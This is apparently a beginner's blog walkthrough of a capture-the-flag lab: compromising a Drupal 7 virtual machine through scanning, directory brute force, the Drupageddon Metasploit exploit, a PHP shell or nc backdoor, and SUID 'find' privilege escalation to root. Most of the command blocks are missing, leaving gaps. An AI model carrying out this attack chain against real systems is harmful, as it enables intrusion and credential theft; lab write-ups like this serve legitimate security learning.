First Post:
Last Update:
Word Count: 3k

information_collect

frist we need locate the machine.

we got command as

or

than i got it on 192.168.242.129

than nmap is we need; nmap can scan the machine with the ports,services,text and so on.so it’s really useful when we are in the early information-collection steps of pentest/ctf and other place.

so we go on

nmap_scan

explain it

tips

we can find two things needed high-lights;

one is druapl site! //a kind of cms

one is robots.txt //the text will ban the sipder of information collecting

we can curl/access with web broswer.

by the way i use firefox(because it based on my kali default)

then for the aim of information collection

we wanna know which of path we can access.

as (HTTP 200 OK!)

save it and open it in vim

tips

use vim command mode as

command:

:%s/Disallow: /

this command can replace the Disallow: with a empty space

for more detail you can see:vim search command

Ok now we can use the dir brute force attack it.

dir_scan

this command means you go an dir attack to the

with wordlists big.txt located in /usr/share/wordlists/dirb

tips

the location of /usr/share/wordlists is the kali-linux official wordlist”built-in” kali

cms_scan

wp_scan

after scanning the dir,to the cms:drupal itself i want know more.

but now i got a mistake that the cms scanner WP-scan is built-in kali.
so i use the wp-scan in this step.

droopescan

after watching the google,i found my fault and search for the drupal-oriented cms scanner.

THE DROOPESCANERRRRRRRRRR.

i scan the website again..

tips

a little break for mind

so whats the most important or vulnerable in hacking an cms??

1. version

why?

version of some cms can find exp on internet or use command

2)themes and plugins

there are many careless developer use unsafe codes.

and the theme and plugins will get high level privilege when the web server runs.

so if you can edit with them or upload them you can use evil php code/js code/.. to privilege you (get root) and get shell.

3)vulnerable setting file or profiles

if any high privilege setting file is avaiable to anonymous users/low privilege users

it will make more unsafe factors in your sys,make more damage and cause unpredictable results.

so with guides, we can see the version is 7.22-7.26

to getshell

drupal vulnerability with msf

if we see this versio in metasploit or searchsploit.

we can got the exp of it

Drupageddon! is!

then we can got www-data//shell

get shell!

but the interface is really bad

tips

using python command

get shell

SQL injections Way

than looking my guide two,use upload plugins or themes in drupal to install shells and nc to create the backdoor.

we can use msf and create the backdoor phps.

the passage here has more detail.

SQL injections unknown way??

also if you know the sql injection how to create may you can use the sql to pump your shell out.

but i fail..if anyone can i hope he/she can tell me just send me email…

tips

now we got shell.

we need to ask 3 question as a Philosopher.

1. who am i?

2)what can i do?

3)where i will go?

whoami:www-data

use command “whoami”/“id” to get detail infomation

what can i do?

to sure that we can use command

as

but in some place as our own kali,this command is banned.

also if find/locate command can use we can got the more deeper searching ability

as we can search the flags or other useful things when pentest.

where i will go?

it is also clear

RRRRRRROOOOOOOOOOOOOOOOOOOOTTTTTTT!!!

little try:sudo

frist we can use sudo can see some script or command you can use as root

NOTHING!it is fucking NOTHING!

try a little bit:suid

then what we can do?

sudo fail,but suid can!
you can see any suid by this way

as follow..

i got mistake there too.
i think may the procmail is the key
but actually not;

tips

so how i got this idea?(means to use the suid)

it is TOP2 easiest way to get shell(one is sudo)

recommend one site for wrong settings to privilege users

use it as an cheatsheet…have fun~

so you can easily find the find` command suid to root it.

command is following.

also explain it

no direct way but a little twist way

another way

we can broswer the file system…

like this~

you can see flag1.txt in your www-data root dir

it tell us to see the setting file

to carefully visit the file system.

you can find the setting.php

also it’s flag2;

it tell us the mysql database username and pass

so get in the mysql database you can see the admin pass(with encrypted one)

tips

google”forget admin pass of drupal” can tell us drupal 7 encypt method and other way to access the drupal dashboard.

so the method is you can both crack or change the pass in mysql or use drupal console to reset it.

make damage is whatever because nobody use this drupal but you. :)

the backend has the article by admin,it’s a hint.

Unh..go to the method 1 use find command to get shell~~;

WIN

now you are root!
WIN!!!!!

————-success————-

thank you for watching~I am Esonhugh,this is the frist blog for me.